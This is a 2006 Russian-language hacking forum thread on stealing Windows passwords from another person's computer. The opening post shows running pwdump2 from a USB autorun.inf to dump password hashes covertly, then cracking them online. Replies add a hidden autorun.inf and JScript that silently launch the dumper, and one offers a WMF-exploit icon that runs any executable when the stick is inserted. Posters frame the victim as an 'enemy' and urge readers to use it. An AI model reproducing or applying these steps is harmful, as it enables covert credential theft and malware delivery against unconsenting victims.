Узнаём пароли Windows за 5 секунд |
15.08.2006, 13:40
|
|
Участник форума
Регистрация: 21.03.2006
Сообщений: 117
Провел на форуме:
629074
Репутация:
137
|
|
Узнаём пароли Windows за 5 секунд
Кто то прошлой недели расказывал про RainbowCrack но как то скупо и мало. И я тоже про него ничего Вам не раскажу. Потому как таких програм уже развелось.
Речь пойдёт о программе pwdump2.exe. Программка в использовании невероятно проста. Достаточно её запустить в командной строке например так :
pwdump2.exe > pass.txt
pass.txt анписал на случайно, потому как туда ушли хеши пользователей.
На канале ачата некий BAY спрашивал зачем тырить пассы у друга (я до того описывал один способов применения, придумайте свой и напишите сдесь  ). Ладно к другу идти не будем. Едём к недругу.
Флешки стали в сей час очень популярны. Создаём на ней файл AUTORUN.INF (например) с таким содержимым :
Код:
[autorun]
OPEN=pwdump2.exe > pass.txt
ICON=pwdump2.exe
Потом чёто там переписываем (новый альбом Бритни Спис илишто.) И без радости на лице (а то спалят) идём домой.
Содержимое :
Код:
administrator:1003:5c39211ab4ae778193e28745b8bf4ba6:e448a0e7ff51ae914a77465923486e68:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:3d26128f74c4b110d9e1cf5872a4fd43:b5122fd690836f3950962915ecb287ce:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:cd01cba60848faf3204a0389d1ac9ef3:::
VUSR_PZ1418:1004:c249e29af807bb32f6c000cbbff0ab93:19c11662fabc4372d38e06edab8c1ec5:::
Наша жертва например administrator. Копируем хеш
Код:
5c39211ab4ae778193e28745b8bf4ba6:e448a0e7ff51ae914a77465923486e68
и заходим на страничку : http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
и там где пишет hash: вставляем наш хеш. Жмём Submit hash. Ждёмс около 5-10 секунд. И вот он пароль.
Так же можно проверить свой пароль если ввести его в поле password:, нам выдаст хеш. Потом пробуем назад. Но єтот онлайн скрипт имеет не большую базу. А её то можно скачать по ссылкам :
SSTIC04-10k (388MB), for PCs with at least 256MB of RAM
SSTIC04-5k (720MB), for PCs with at least 512MB of RAM.
Вообщем всё это читаете на том же сайте.
Ах да. Где я взял pwdump2.exe? Если чесно то в гугле. Но если комуто тяжело искать то берите откуда брял я : http://www.doubleupsoftware.com/files/pwdump2.zip
На этом и буду процатся.
З.Ы. Это моя первая такого рода статья. Интересно Ваше мнение по поводу написания. |
|
|
15.08.2006, 18:04
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
На сколько мне известно, флеш не автозапускается из авторана, как сд. И говорили об этом уже не один раз.
Единственно, что из авторана считывается иконка. А иконка, это картинка. А в картинках можно организовать переполнение буфера аля WMF. Или ещё одно переполнение в .bmp
Кстати, нашли ещё одну дыру в WMF, правда там только дос. Проводник или любое другое кэширующе\воспроизводящая прога красиво падает в даун 
И вообще. pwdump разработали в 2000 году. А в каком году ХР вышло ? Не подскажите?
Будем надеется, что у другана win2000 или NT. |
|
|
|
15.08.2006, 18:29
|
|
Участник форума
Регистрация: 21.03.2006
Сообщений: 117
Провел на форуме:
629074
Репутация:
137
|
|
по тексту читаем :
pwdump2.exe
Работает на ХР и 2003 серваке отлично. Проверенно. А вот чесно скажу на 2000 и НТ не проверял, поскоку небыло под руками.
|
|
|
|
15.08.2006, 19:12
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Ок! хрюша прошла тест Извиняюсь, просто как то не верилось, да и помнится мне старая версия дампа.
Правда мой 10символьник сайт не разгодал )
Читанул сайтец. Интересная консольная альтернатива.
2003 отказалась.
Но с флешкой не прокатит просто так. это 100%
Неоднократно проверял. С неё и загрузить операционку трудно... Вобщем много там заморочек.
Но говорю, можно заюзать фичу с картинкой. Читаем статьи лебеда про метасплоит.
Последний раз редактировалось Elekt; 15.08.2006 в 19:18..
|
|
|
|
15.08.2006, 20:38
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054
Репутация:
1292
|
|
Сообщение от Elekt
Но с флешкой не прокатит просто так. это 100%
Юзал подобную фишку. В autorun.inf нужно написать
Код:
[autorun]
ICON=icon.ico
OPEN=wscript autorun.js
ACTION=Take no action
Выдрать у shell32'a иконку
создать файл autorun.js
Код:
var WshShell = new ActiveXObject("WScript.Shell");
var oExec = WshShell.Run('cmd /C "xxx\\progs\\PassRecovery\\pwdump2\\pwdump2.exe>>pass.txt"',0);
И всё работает наура, только после вставки флэшки, остаётся нажать Enter, на якомы "Ничего не делать" 
Да, и ещё сделать их все скрытыми и системными
Статья неплохая, держи +2
|
|
|
|
22.03.2007, 18:04
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Сообщение от Elekt
Ок! хрюша прошла тест Извиняюсь, просто как то не верилось, да и помнится мне старая версия дампа.
Правда мой 10символьник сайт не разгодал )
Читанул сайтец. Интересная консольная альтернатива.
2003 отказалась.
Но с флешкой не прокатит просто так. это 100%
Неоднократно проверял. С неё и загрузить операционку трудно... Вобщем много там заморочек.
Но говорю, можно заюзать фичу с картинкой. Читаем статьи лебеда про метасплоит. Вот сделал по идее Elekt`a. Используется уязвимость WMF, распакуйте содержимое архива на флешку. Там два файла icon.ico - WMF-сплоит с начинкой win32_exec (set CMD start.exe) и start.exe (не бойтесь - это не вирь, а Starter - полезная тулза). Если глянуть свойства иконки он запустится, а иногда достаточно только вставить флеху и запустится. Вы можете заменить start.exe чем хотите (главное чтоб имя было такое же). скачать набор ;-)
autorun.inf - сами добавите если надо...
P.S. Проверено на Win 2003 server SP1 и Win XP SP2 (без заплаток и антивиря) - пашет как часы... пользуйтесь ;-)
Кто будет тестить, отпишитесь... получилось или нет. При скачке архива антивирь тормознёт архив - пропустите (сплоит wmf "icon.ico" - уже давольно старый - естественно палица и есть во многих базах)
Последний раз редактировалось -=lebed=-; 22.03.2007 в 18:09..
|
|
|
|
15.08.2006, 20:31
|
|
Участник форума
Регистрация: 21.03.2006
Сообщений: 117
Провел на форуме:
629074
Репутация:
137
|
|
грузить операционку?... эт не то..
Это автозагрузка (как с сидюка). А её мало кто выключает (но не я конечно). Так что вариант.
|
|
|
|
03.09.2006, 16:38
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Предотвращение выполнения данных — Microsoft Windows
LSA Shell (Export Version)
Закрыть сообщение
Хех... сработала защитп =)
Windows XP MC 2005 рулид =)
За статью + !
|
|
|
|
16.09.2006, 15:07
|
|
Новичок
Регистрация: 10.09.2006
Сообщений: 3
Провел на форуме:
8503
Репутация:
0
|
|
А есть ли какая нибудь программа для расшифровки хешей? А то каждый раз на сайл бродить неудобно |
|
|
|
16.09.2006, 20:35
|
|
Участник форума
Регистрация: 17.08.2005
Сообщений: 237
Провел на форуме:
1575267
Репутация:
27
|
|
А у меня вот что то тема с флэшкой не канает...
вроде всё сделал как hidden написал но всё равно не выходит.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
